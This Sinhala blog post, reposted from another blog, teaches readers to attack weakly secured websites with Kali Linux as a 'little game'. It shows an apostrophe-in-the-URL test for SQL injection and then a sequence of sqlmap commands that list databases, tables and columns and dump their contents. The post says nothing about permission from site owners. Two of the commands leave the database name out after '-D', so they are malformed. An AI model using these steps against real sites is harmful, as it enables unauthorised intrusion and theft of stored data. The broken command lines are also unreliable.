කොහොමද කොල්ලනේ කෙල්ලනේ. මෙන්න අද මම අරගෙන ආවා ඔයාලා බලාපොරොත්තුවෙන් හිටපුදෙයක්. ඒ තමයි Kali Linux වලින් කරන පොඩි ගේමක්. මේක ඉතින් මාතෘකාව දැක්කාම පේනවානේ මොකද්ද කියලා. හැබැයි යාළුවනේ මේක කරන්න පුළුවන් ආරක්ෂාව අතින් දුර්වල වෙබ්සයිට් වලට විතරයි. එහෙනම් අපි බලමු කොහොමද මේක කරන්නේ කියලා.
![image]()
මම කලිනුත් Kali Linux ගැන පොස්ටුවක් දැම්මා ඒක බලන්න මෙතනින් යන්න.
මම මේ වැඩේ කරන හැටි ගැන වීඩියෝ එකක් කළා එක හැබැයි ඔන්ලයින් බලන්න දැම්මේ නෑ. බාගෙන තමා බලන්න තියෙන්නේ. WinRAR වලින් හකුළුවලා තමා දැම්මේ. තව දෙයක් මේකේ මම ගහන Codes ටික පැහැදිලි නැති අයට බලාගන්න පහළින් දාන්නම්. බයවෙන්න දෙයක් නැහැ. මේක HD නිසා අවුලක් නෑ. හොඳට පැහැදිලියි. ඒත් වැඩේ කරගන්න අමාරු අයට Codes ටික පහළින් දාන්නම්.
මේකේ අපි ඉස්සෙල්ලාම බලනවා. අපේ Target Website එක දුර්වල එකක් ද කියලා. මේක කරන්නේ Target Website එකේ URL එක අන්තිමට ' ලකුණ යෙදීමෙන්.
මේහෙමයි, අපේ Target Website එක
www.yoursite.com/page.php
කියලා හිතමුකෝ. දැන් ඔන්න ඕකේ අන්තිමට ' ලකුණ දාලා අපි බලනවා ERROR එකක් එනවාද කියලා.
www.yoursite.com/page.php'
එතකොට Website එකේ URL එක ඔන්න ඔයවගේ තමා. දැන් ඉතින් ඔන්න ඔය වැඩේ තමයි ඉස්සෙල්ලාම ඔය Video එකේ කරන්නේ.
මෙන්න Codes ටික
මේන්න එහෙනම් වීඩියෝ එක පහළින් බාගන්න.
Download Video
![image]()
(File Size : 11.75 MB )
එහෙනම් අදට මේච්චරයි. මොනවාම හරි ප්‍රශ්නයක් තිබ්බොත් පහළින් දාන්නකෝ එහෙනම් මම ගියා. ආයි දවසක අලුත් පෝසටුවකින් හමුවෙමු.
*උපුටා ගැනීම http://black-pc-tricks.blogspot.com/

01.sqlmap -u www.yoursite.com/page.php --dbs
02.sqlmap -u www.yoursite.com/page.php -D your_database_name --tables
03.sqlmap -u www.yoursite.com/page.php -D -T your_table_name --columns
04.sqlmap -u www.yoursite.com/page.php -D -T your_table_name -C your_columns_name --dump